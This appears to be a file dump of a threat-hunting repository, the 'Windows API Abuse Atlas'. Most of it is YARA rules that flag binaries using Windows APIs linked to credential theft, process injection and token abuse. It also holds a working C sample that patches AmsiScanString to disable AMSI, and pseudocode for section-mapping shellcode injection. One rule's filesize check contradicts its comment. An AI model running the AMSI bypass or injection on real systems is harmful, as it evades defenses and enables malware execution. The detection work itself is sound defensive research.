| -------------------------------------------------------------------------------- /ADVAPI32/CredEnumerateW/CredEnumerateW.yar: -------------------------------------------------------------------------------- 1 | 2 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 3 | // for threat hunting and research purposes — not for deployment in detection systems that 4 | // require a low false positive rate. Please review and test in your environment before use. 5 | 6 | rule Potential_CredEnumerateW_Abuse 7 | { 8 | meta: 9 | description = "Detects potential abuse of CredEnumerateW API in credential-harvesting malware" 10 | reference = "Windows API Abuse Atlas - CredEnumerateW" 11 | 12 | strings: 13 | $s1 = "CredEnumerate" wide ascii 14 | $s2 = "CredentialBlob" wide ascii 15 | $s3 = "TargetName" wide ascii 16 | $s4 = "UserName" wide ascii 17 | $s5 = "CredFree" wide ascii 18 | $s6 = "CRED_ENUMERATE" wide ascii 19 | 20 | condition: 21 | uint16(0) == 0x5A4D and 22 | 2 of ($s1, $s2, $s3, $s4, $s5, $s6) 23 | } -------------------------------------------------------------------------------- /KERNEL32/EnumProcesses/sample.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | modPsapi = syscall.NewLazyDLL("psapi.dll") 11 | procEnumProcesses = modPsapi.NewProc("EnumProcesses") 12 | ) 13 | 14 | func main() { 15 | const maxPids = 1024 16 | var processIds [maxPids]uint32 17 | var bytesReturned uint32 18 | 19 | ret, _, err := procEnumProcesses.Call( 20 | uintptr(unsafe.Pointer(&processIds[0])), // Process IDs buffer 21 | uintptr(len(processIds)*4), // Size of buffer in bytes 22 | uintptr(unsafe.Pointer(&bytesReturned)), // Bytes returned 23 | ) 24 | 25 | if ret == 0 { 26 | fmt.Printf("EnumProcesses failed: %v\n", err) 27 | return 28 | } 29 | 30 | numProcs := bytesReturned / 4 31 | fmt.Printf("Found %d running processes:\n", numProcs) 32 | for i := 0; i < int(numProcs); i++ { 33 | fmt.Printf("PID: %d\n", processIds[i]) 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /KERNEL32/SetDllDirectory/SetDllDirectory.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | import "pe" 5 | 6 | rule malware_setdlldirectory_use 7 | { 8 | meta: 9 | author = "Windows API Abuse Atlas" 10 | description = "Detects import of SetDllDirectory API, which can be a sign of malicious DLL side-loading." 11 | 12 | strings: 13 | $SetDllDirectory = "SetDllDirectory" ascii wide 14 | 15 | condition: 16 | // Ensure the file is a PE executable 17 | uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 18 | 19 | // Check if the file imports from kernel32.dll 20 | pe.imports("kernel32.dll") and 21 | 22 | $SetDllDirectory 23 | } -------------------------------------------------------------------------------- /NETAPI32/NetUserAdd/NetUserAdd.yar: -------------------------------------------------------------------------------- 1 | 2 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 3 | // for threat hunting and research purposes — not for deployment in detection systems that 4 | // require a low false positive rate. Please review and test in your environment before use. 5 | 6 | import "pe" 7 | 8 | rule detect_netuseradd_abuse { 9 | 10 | meta: 11 | description = "Detects potential abuse of NetUserAdd API for creating user accounts" 12 | author = "WindowsAPIAbuseAtlas" 13 | 14 | strings: 15 | $user1 = "admin" ascii wide 16 | $user2 = "backup" ascii wide 17 | $user3 = "support" ascii wide 18 | $user4 = "sysadmin" ascii wide 19 | $user5 = "temp" ascii wide 20 | $user6 = "test" ascii wide 21 | 22 | condition: 23 | uint16(0) == 0x5A4D 24 | and pe.imports("netapi32.dll", "NetUserAdd") 25 | and (any of ($user*)) 26 | } 27 | 28 | -------------------------------------------------------------------------------- /KERNEL32/GetSystemFirmwareTable/GetSystemFirmwareTable.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | import "pe" 5 | 6 | rule Suspicious_GetSystemFirmwareTable_Usage 7 | { 8 | meta: 9 | author = "Windows API Abuse Atlas" 10 | description = "Detects potential malicious calls to GetSystemFirmwareTable in Windows binaries" 11 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 12 | 13 | strings: 14 | // API name 15 | $GetSystemFirmwareTable = "GetSystemFirmwareTable" ascii wide 16 | 17 | condition: 18 | uint16(0) == 0x5A4D and // PE header 19 | filesize < 2MB and 20 | (pe.imports("GetSystemFirmwareTable") or 21 | $GetSystemFirmwareTable) 22 | } -------------------------------------------------------------------------------- /NTDLL/NtAllocateVirtualMemory/NtAllocateVirtualMemory.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_alloc_write_exec_sequence_strings 6 | { 7 | meta: 8 | author = "Windows API Abuse Atlas example" 9 | description = "Heuristic: binary mentions allocation + protection + thread creation APIs in the same file (noisy but useful for hunting builders)" 10 | strings: 11 | $NtAllocateVirtualMemory = "NtAllocateVirtualMemory" 12 | $api_1 = "NtProtectVirtualMemory" 13 | $api_2 = "NtWriteVirtualMemory" 14 | $api_3 = "NtCreateThread" 15 | condition: 16 | uint16(0) == 0x5A4D and 17 | filesize < 10MB and 18 | $NtAllocateVirtualMemory and 19 | (1 of ($api*)) 20 | } 21 | -------------------------------------------------------------------------------- /PSAPI/GetModuleFileNameEx/GetModuleFileNameEx.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | import "pe" 6 | 7 | rule Suspicious_GetModuleFileNameEx_Usage 8 | { 9 | meta: 10 | description = "Detects potential malicious use of GetModuleFileNameEx API in binaries" 11 | note = "Hunting rule - expect false positives" 12 | strings: 13 | $GetModuleFileNameEx = "GetModuleFileNameEx" ascii wide 14 | $EnumProcesses = "EnumProcesses" ascii wide 15 | $OpenProcess = "OpenProcess" ascii wide 16 | 17 | condition: 18 | uint16(0) == 0x5A4D and // PE file 19 | filesize < 10MB and 20 | pe.imports("psapi.dll") > 0 and 21 | $GetModuleFileNameEx and 22 | $EnumProcesses and 23 | $OpenProcess 24 | } -------------------------------------------------------------------------------- /ADVAPI32/LsaRetrievePrivateData/LsaRetrievePrivateData.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_LsaRetrievePrivateData_Usage 6 | { 7 | meta: 8 | description = "Detects use of LsaRetrievePrivateData to pull secrets like SCPassword from LSA" 9 | reference = "Windows API Abuse Atlas" 10 | 11 | strings: 12 | $api1 = "LsaRetrievePrivateData" ascii 13 | $api2 = "LsaOpenPolicy" ascii 14 | $perm = "POLICY_GET_PRIVATE_INFORMATION" ascii 15 | $key1 = "SCPassword" ascii 16 | $key2 = "AppPoolPassword" ascii 17 | $key3 = "ServiceAccountPassword" ascii 18 | 19 | condition: 20 | uint16(0) == 0x5A4D and // PE file 21 | 2 of ($api*) and 22 | 1 of ($key*) and 23 | $perm 24 | } -------------------------------------------------------------------------------- /NTDLL/NtMapViewOfSection/sample.c: -------------------------------------------------------------------------------- 1 | // Simplified pseudocode illustrating shellcode injection with NtWriteVirtualMemory + NtMapViewOfSection 2 | 3 | // 1. Create a section object with execute permissions 4 | NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, &maxSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL); 5 | 6 | // 2. Map the section into the current process so we can write shellcode to it 7 | NtMapViewOfSection(hSection, GetCurrentProcess(), &localBaseAddress, 0, 0, NULL, &viewSize, ViewUnmap, 0, PAGE_READWRITE); 8 | 9 | // 3. Write shellcode into the mapped section (could use memcpy or NtWriteVirtualMemory) 10 | memcpy(localBaseAddress, shellcode, sizeof(shellcode)); 11 | 12 | // 4. Map the same section into the target process with execute permissions 13 | NtMapViewOfSection(hSection, hTargetProcess, &remoteBaseAddress, 0, 0, NULL, &viewSize, ViewUnmap, 0, PAGE_EXECUTE_READ); 14 | 15 | // 5. Create a remote thread (or hijack an existing thread) to execute the shellcode at remoteBaseAddress 16 | NtCreateThreadEx(..., remoteBaseAddress, ...); 17 | -------------------------------------------------------------------------------- /KERNEL32/VirtualProtectEx/VirtualProtectEx.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_VirtualProtectEx_Usage 6 | { 7 | meta: 8 | description = "Detects suspicious or potentially malicious use of VirtualProtectEx, especially in remote process injection chains." 9 | reference = "Windows API Abuse Atlas: VirtualProtectEx" 10 | 11 | strings: 12 | $VirtualProtectEx = "VirtualProtectEx" ascii wide 13 | 14 | $api_VirtualAllocEx = "VirtualAllocEx" ascii wide 15 | $api_WriteProcessMemory = "WriteProcessMemory" ascii wide 16 | $api_CreateRemoteThread = "CreateRemoteThread" ascii wide 17 | 18 | condition: 19 | uint16(0) == 0x5A4D and // PE file 20 | $VirtualProtectEx and 21 | ( 2 of ($api*) ) 22 | } 23 | -------------------------------------------------------------------------------- /URLMON/URLDownloadToFile/URLDownloadToFile.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_Uses_of_URLDownloadToFile 6 | { 7 | meta: 8 | author = "Windows API Abuse Atlas" 9 | description = "Heuristic: PE that imports URLDownloadToFile or contains explicit URL-download strings." 10 | 11 | strings: 12 | $URLDownloadToFile = "URLDownloadToFile" ascii nocase 13 | $http_marker = "http://" ascii nocase 14 | $https_marker = "https://" ascii nocase 15 | $temp_env = "%TEMP%" ascii nocase 16 | $temp_path = "\\\\Temp\\\\" ascii nocase 17 | 18 | condition: 19 | (uint16(0) == 0x5A4D) and /* basic PE check */ 20 | $URLDownloadToFile and 21 | any of ($http_marker, $https_marker, $temp_env, $temp_path) 22 | } 23 | 24 | -------------------------------------------------------------------------------- /ADVAPI32/CreateProcessAsUser/CreateProcessAsUser.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_CreateProcessAsUserW_Usage 6 | { 7 | meta: 8 | description = "Detects potential abuse of CreateProcessAsUserW in binaries" 9 | author = "Windows API Abuse Atlas" 10 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 11 | 12 | strings: 13 | $CreateProcessAsUser = "CreateProcessAsUserW" ascii wide 14 | $api1 = "DuplicateTokenEx" ascii 15 | $api2 = "LogonUserW" ascii 16 | $s1 = "SeAssignPrimaryTokenPrivilege" ascii 17 | $s2 = "SeIncreaseQuotaPrivilege" ascii 18 | 19 | condition: 20 | uint16(0) == 0x5A4D and 21 | $CreateProcessAsUser and 22 | filesize < 10MB and 23 | ($api1 or $api2) and 24 | ($s1 or $s2) 25 | } 26 | -------------------------------------------------------------------------------- /AMSI/AmsiScanString/sample.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(void) { 5 | HMODULE hAmsi = LoadLibraryA("amsi.dll"); 6 | if (!hAmsi) { 7 | printf("[-] Failed to load amsi.dll\n"); 8 | return -1; 9 | } 10 | 11 | FARPROC pAmsiScanString = GetProcAddress(hAmsi, "AmsiScanString"); 12 | if (!pAmsiScanString) { 13 | printf("[-] Failed to resolve AmsiScanString\n"); 14 | return -1; 15 | } 16 | 17 | printf("[+] AmsiScanString located at: 0x%p\n", pAmsiScanString); 18 | 19 | unsigned char patch[] = { 0xB8, 0x00, 0x00, 0x00, 0x00, 0xC3 }; 20 | 21 | DWORD oldProtect; 22 | if (VirtualProtect((LPVOID)pAmsiScanString, sizeof(patch), PAGE_EXECUTE_READWRITE, &oldProtect)) { 23 | memcpy(pAmsiScanString, patch, sizeof(patch)); 24 | VirtualProtect((LPVOID)pAmsiScanString, sizeof(patch), oldProtect, &oldProtect); 25 | printf("[+] Successfully patched AmsiScanString!\n"); 26 | } else { 27 | printf("[-] Failed to change memory protection.\n"); 28 | } 29 | 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /KERNEL32/CreateRemoteThread/CreateRemoteThread.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Win_APIAbuse_CreateRemoteThread_SuspiciousUsage 6 | { 7 | meta: 8 | description = "Detects suspicious use of CreateRemoteThread typically associated with process injection" 9 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 10 | 11 | strings: 12 | $api_CreateRemoteThread = "CreateRemoteThread" ascii 13 | $api_VirtualAllocEx = "VirtualAllocEx" ascii 14 | $api_WriteProcessMemory = "WriteProcessMemory" ascii 15 | $api_DuplicateHandle = "DuplicateHandle" ascii 16 | 17 | condition: 18 | // Require CreateRemoteThread + at least two classic injection APIs 19 | uint16(0) == 0x5A4D and // PE file 20 | filesize < 5MB and 21 | all of them 22 | } 23 | -------------------------------------------------------------------------------- /NTDLL/NtQuerySystemInformation/NtQuerySystemInformation.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_NtQuerySystemInformation_Usage 6 | { 7 | meta: 8 | description = "Hunt for binaries that reference NtQuerySystemInformation / ZwQuerySystemInformation" 9 | author = "Windows API Abuse Atlas" 10 | date = "2025-10-06" 11 | 12 | strings: 13 | $NtQuerySystemInformation = "NtQuerySystemInformation" 14 | $ZwQuerySystemInformation = "ZwQuerySystemInformation" 15 | $SystemModuleInformation = "SystemModuleInformation" 16 | $SystemProcessInformation = "SystemProcessInformation" 17 | 18 | condition: 19 | uint16(0) == 0x5A4D and 20 | ($NtQuerySystemInformation or $ZwQuerySystemInformation) and 21 | ($SystemModuleInformation or $SystemProcessInformation) 22 | } -------------------------------------------------------------------------------- /KERNEL32/CreateEvent/CreateEvent.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_CreateEvent_Use 6 | { 7 | meta: 8 | author = "Windows API Abuse Atlas" 9 | description = "Detects potential malicious use of CreateEvent (named events, single-instance enforcement, or suspicious context)." 10 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 11 | date = "2025-09-04" 12 | version = "1.0" 13 | 14 | strings: 15 | $CreateEvent = "CreateEvent" ascii wide 16 | 17 | // Common suspicious substrings in named events 18 | $name_global = "Global\\" ascii wide 19 | $name_local = "Local\\" ascii wide 20 | 21 | condition: 22 | (uint16(0) == 0x5A4D) and // PE file 23 | filesize < 10MB and 24 | $CreateEvent and 25 | (any of ($name*)) 26 | } 27 | -------------------------------------------------------------------------------- /ADVAPI32/CryptEnumProviders/CryptEnumProviders.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | rule Suspicious_CryptEnumProviders_Usage 5 | { 6 | meta: 7 | description = "Detects use of CryptEnumProviders API, often used for cryptographic provider enumeration or key recon" 8 | reference = "Windows API Abuse Atlas" 9 | strings: 10 | // Main target API 11 | $crypt_enum = "CryptEnumProviders" ascii wide 12 | 13 | // Supporting indicators 14 | $acquire_ctx = "CryptAcquireContext" ascii wide 15 | $export_key = "CryptExportKey" ascii wide 16 | $sign_hash = "CryptSignHash" ascii wide 17 | 18 | condition: 19 | uint16(0) == 0x5A4D and // PE file 20 | filesize > 10MB and // Ensure it's a reasonably sized file 21 | $crypt_enum and 22 | any of ($acquire_ctx, $export_key, $sign_hash) 23 | } -------------------------------------------------------------------------------- /ADVAPI32/CreateProcessWithTokenW/CreateProcessWithTokenW.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | 6 | rule Suspicious_CreateProcessWithTokenW_Usage 7 | { 8 | meta: 9 | author = "Windows API Abuse Atlas" 10 | description = "Detects use of CreateProcessWithTokenW with suspicious token manipulation patterns" 11 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 12 | 13 | strings: 14 | $api1 = "CreateProcessWithToken" ascii wide 15 | $api2 = "DuplicateTokenEx" ascii wide 16 | $api3 = "OpenProcessToken" ascii wide 17 | $api4 = "OpenProcess" ascii wide 18 | $api5 = "LookupPrivilegeValue" ascii wide 19 | $lolbin1 = "cmd.exe" ascii wide 20 | $lolbin2 = "powershell.exe" ascii wide 21 | $lolbin3 = "rundll32.exe" ascii wide 22 | 23 | condition: 24 | all of ($api*) and 1 of ($lolbin*) and filesize < 5MB 25 | } 26 | -------------------------------------------------------------------------------- /NTDLL/ZwUnmapViewOfSection/ZwUnmapViewOfSection.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_ZwUnmapViewOfSection_Usage 6 | { 7 | meta: 8 | description = "Detects potential malicious usage of ZwUnmapViewOfSection API" 9 | reference = "Windows API Abuse Atlas" 10 | 11 | strings: 12 | $ZwUnmapViewOfSection = "ZwUnmapViewOfSection" ascii wide 13 | 14 | $api_CreateProcess = "CreateProcess" ascii wide 15 | $api_WriteVirtualMemory = "WriteProcessMemory" ascii wide 16 | $api_ResumeThread = "ResumeThread" ascii wide 17 | $api_VirtualAllocEx = "VirtualAllocEx" ascii wide 18 | $api_MapViewOfSection = "MapViewOfSection" ascii wide 19 | $api_QueueUserAPC = "QueueUserAPC" ascii wide 20 | 21 | condition: 22 | uint16(0) == 0x5A4D and // PE file 23 | filesize < 10MB and 24 | $ZwUnmapViewOfSection and 25 | (3 of ($api*)) 26 | } 27 | -------------------------------------------------------------------------------- /NTDLL/NtCreateThreadEx/NtCreateThreadEx.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | 6 | rule NtCreateThreadEx_Suspicious_Combo 7 | { 8 | meta: 9 | description = "Detects binaries using NtCreateThreadEx with other suspicious APIs" 10 | author = "WindowsAPIAbuseAtlas" 11 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 12 | strings: 13 | $NtCreateThreadEx = "NtCreateThreadEx" ascii wide 14 | $api1 = "NtAllocateVirtualMemory" ascii wide 15 | $api2 = "NtProtectVirtualMemory" ascii wide 16 | $api3 = "NtWriteVirtualMemory" ascii wide 17 | $api4 = "NtQueueApcThread" ascii wide 18 | $api5 = "NtResumeThread" ascii wide 19 | $api6 = "NtOpenProcess" ascii wide 20 | $api7 = "NtOpenThread" ascii wide 21 | condition: 22 | uint16(0) == 0x5A4D and 23 | filesize < 10MB and 24 | $NtCreateThreadEx and 25 | (2 of ($api*)) 26 | } -------------------------------------------------------------------------------- /ADVAPI32/RegEnumKeyEx/RegEnumKeyEx.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_RegEnumKeyEx_Usage 6 | { 7 | meta: 8 | author = "Windows API Abuse Atlas" 9 | description = "Detects suspicious references to RegEnumKeyEx, often abused for registry reconnaissance" 10 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 11 | 12 | strings: 13 | $RegEnumKey = "RegEnumKey" ascii wide 14 | 15 | $api_1 = "RegOpenKeyEx" ascii wide 16 | $api_2 = "RegQueryValueEx" ascii wide 17 | $api_3 = "RegSetValueEx" ascii wide 18 | $api_4 = "RegCreateKeyEx" ascii wide 19 | $api_5 = "RegDeleteKey" ascii wide 20 | $api_6 = "RegDeleteValue" ascii wide 21 | $api_7 = "RegCloseKey" ascii wide 22 | 23 | condition: 24 | uint16(0) == 0x5A4D and // MZ header 25 | $RegEnumKey and 26 | (2 of ($api_*)) // At least one other registry API 27 | } -------------------------------------------------------------------------------- /NTDLL/NtSetInformationProcess/NtSetInformationProcess.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_NtSetInformationProcess_Usage 6 | { 7 | meta: 8 | description = "Detects potential malicious usage of NtSetInformationProcess API" 9 | reference = "Windows API Abuse Atlas" 10 | 11 | strings: 12 | $NtSetInformationProcess = "NtSetInformationProcess" ascii wide 13 | $api_ProcessInstrumentationCallback = "ProcessInstrumentationCallback" 14 | $api_InstrumentationCallback = "InstrumentationCallback" 15 | $api_api_EtwEventWrite = "EtwEventWrite" 16 | $api_EtwRegister = "EtwRegister" 17 | $api_EtwWrite = "EtwWrite" 18 | $api_GetProcAddress = "GetProcAddress" 19 | $api_LoadLibrary = "LoadLibrary" 20 | condition: 21 | uint16(0) == 0x5A4D and // PE file 22 | filesize < 10MB and 23 | $NtSetInformationProcess and 24 | (3 of ($api*)) 25 | } -------------------------------------------------------------------------------- /ADVAPI32/DuplicateTokenEx/DuplicateTokenEx.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_DuplicateTokenEx_Usage 6 | { 7 | meta: 8 | author = "Windows API Abuse Atlas" 9 | description = "Detects binaries that reference DuplicateTokenEx for potential token theft/privilege escalation" 10 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 11 | 12 | strings: 13 | $DuplicateTokenEx = "DuplicateTokenEx" ascii wide 14 | 15 | // common related APIs often paired with DuplicateTokenEx 16 | $api_1 = "CreateProcessWithTokenW" ascii wide 17 | $api_2 = "CreateProcessAsUserW" ascii wide 18 | $api_3 = "ImpersonateLoggedOnUser" ascii wide 19 | 20 | condition: 21 | uint16(0) == 0x5A4D and 22 | filesize < 5MB and 23 | // Match if DuplicateTokenEx is present, especially with its "friends" 24 | $DuplicateTokenEx and 25 | (any of ($api_*) ) 26 | } 27 | -------------------------------------------------------------------------------- /KERNEL32/CreateNamedPipe/CreateNamedPipe.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | 6 | rule Hunt_CreateNamedPipe_Usage 7 | { 8 | meta: 9 | description = "Hunting rule to find any binary referencing CreateNamedPipe" 10 | purpose = "Threat hunting only – expect high false positives" 11 | 12 | strings: 13 | $CreateNamedPipe = "CreateNamedPipe" ascii wide 14 | 15 | // Related named pipe server APIs 16 | $api_1 = "ConnectNamedPipe" ascii wide 17 | $api_2 = "CallNamedPipe" ascii wide 18 | $api_3 = "WaitNamedPipeA" ascii wide 19 | 20 | // Generic IO functions often used with pipes 21 | $readfile = "ReadFile" ascii wide 22 | $writefile = "WriteFile" ascii wide 23 | 24 | condition: 25 | (uint16(0) == 0x5A4D) and // PE file 26 | filesize < 10MB and // reasonable size limit 27 | $CreateNamedPipe and 28 | (1 of ($api*)) and 29 | ($readfile or $writefile) 30 | } -------------------------------------------------------------------------------- /ADVAPI32/OpenSCManager/OpenSCManager.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_Service_Control_Abuse 6 | { 7 | meta: 8 | description = "Detects use of OpenSCManager along with other service manipulation APIs" 9 | author = "Windows API Abuse Atlas" 10 | 11 | strings: 12 | $openscmanager = "OpenSCManager" wide ascii 13 | $createservice = "CreateService" wide ascii 14 | $startservice = "StartService" wide ascii 15 | $deleteservice = "DeleteService" wide ascii 16 | $chgsvcconfig = "ChangeServiceConfig" wide ascii 17 | $ctrlservice = "ControlService" wide ascii 18 | $enumsvcstatus = "EnumServicesStatus" wide ascii 19 | $openservice = "OpenService" wide ascii 20 | 21 | condition: 22 | uint16(0) == 0x5A4D and // PE file 23 | $openscmanager and 24 | 2 of ($createservice, $startservice, $deleteservice, $chgsvcconfig, $ctrlservice, $enumsvcstatus, $openservice) 25 | } 26 | -------------------------------------------------------------------------------- /KERNEL32/VirtualAllocEx/VirtualAllocEx.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_RemoteMemoryAllocation_Use 6 | { 7 | meta: 8 | author = "Windows API Abuse Atlas" 9 | description = "Detects suspicious use of remote memory allocation and injection APIs" 10 | 11 | strings: 12 | $api1 = "VirtualAllocEx" wide ascii 13 | $api2 = "WriteProcessMemory" wide ascii 14 | $api3 = "CreateRemoteThread" wide ascii 15 | $api4 = "QueueUserAPC" wide ascii 16 | $api5 = "OpenProcess" wide ascii 17 | $api6 = "GetProcAddress" wide ascii 18 | $api7 = "LoadLibraryA" wide ascii 19 | $api8 = "LoadLibraryW" wide ascii 20 | $api9 = "NtUnmapViewOfSection" wide ascii 21 | $api10 = "ZwUnmapViewOfSection" wide ascii 22 | 23 | condition: 24 | uint16(0) == 0x5A4D and // PE file 25 | $api1 and $api2 and 26 | ( $api3 or $api4 ) and 27 | 3 of ($api5, $api6, $api7, $api8, $api9, $api10) 28 | } -------------------------------------------------------------------------------- /NETAPI32/DsGetDcName/DsGetDcName.yar: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | rule Hunt_DsGetDcName_Usage 4 | { 5 | meta: 6 | description = "Hunt rule for binaries referencing DsGetDcName, used in domain controller enumeration" 7 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 8 | strings: 9 | // API references 10 | $dsgetdc = "DsGetDcName" ascii wide 11 | 12 | // Dynamic resolution patterns 13 | $loadlib = "LoadLibrary" ascii wide 14 | $getproc = "GetProcAddress" ascii wide 15 | 16 | // Optional supporting context 17 | $domaininfo = "DomainControllerInfo" ascii wide 18 | $netjoin = "NetGetJoinInformation" ascii wide 19 | $dsgetsite = "DsGetSiteName" ascii wide 20 | 21 | condition: 22 | uint16(0) == 0x5A4D and // PE file check 23 | $dsgetdc and 24 | ( 25 | any of ($loadlib, $getproc) or 26 | any of ($domaininfo, $netjoin, $dsgetsite) 27 | ) 28 | } 29 | 30 | rule Hunt_DsGetDcName_Imported 31 | { 32 | meta: 33 | description = "Just looking for imports of DsGetDcName" 34 | condition: 35 | pe.imports("NetApi32.dll", "DsGetDcNameW") or 36 | pe.imports("NetApi32.dll", "DsGetDcNameA") 37 | } -------------------------------------------------------------------------------- /KERNEL32/GetSystemFirmwareTable/sample.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void getFirmwareTable(const char* providerName) 5 | { 6 | DWORD provider = *(DWORD*)providerName; // Convert 4-char string to DWORD 7 | DWORD bufferSize = GetSystemFirmwareTable(provider, 0, NULL, 0); 8 | 9 | if (bufferSize == 0) 10 | { 11 | printf("[%s] No data or failed to get size. Error: %lu\n", providerName, GetLastError()); 12 | return; 13 | } 14 | 15 | BYTE* buffer = (BYTE*)malloc(bufferSize); 16 | if (!buffer) 17 | { 18 | printf("Failed to allocate buffer.\n"); 19 | return; 20 | } 21 | 22 | DWORD retSize = GetSystemFirmwareTable(provider, 0, buffer, bufferSize); 23 | if (retSize == 0) 24 | { 25 | printf("[%s] Failed to get firmware table. Error: %lu\n", providerName, GetLastError()); 26 | } 27 | else 28 | { 29 | printf("[%s] Retrieved firmware table. Size: %lu bytes\n", providerName, retSize); 30 | } 31 | 32 | free(buffer); 33 | } 34 | 35 | int main() 36 | { 37 | printf("=== GetSystemFirmwareTable Demo ===\n"); 38 | 39 | getFirmwareTable("ACPI"); // ACPI table 40 | getFirmwareTable("RSMB"); // Raw SMBIOS table 41 | 42 | return 0; 43 | } 44 | -------------------------------------------------------------------------------- /SHELL32/ShellExecute/ShellExecute.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 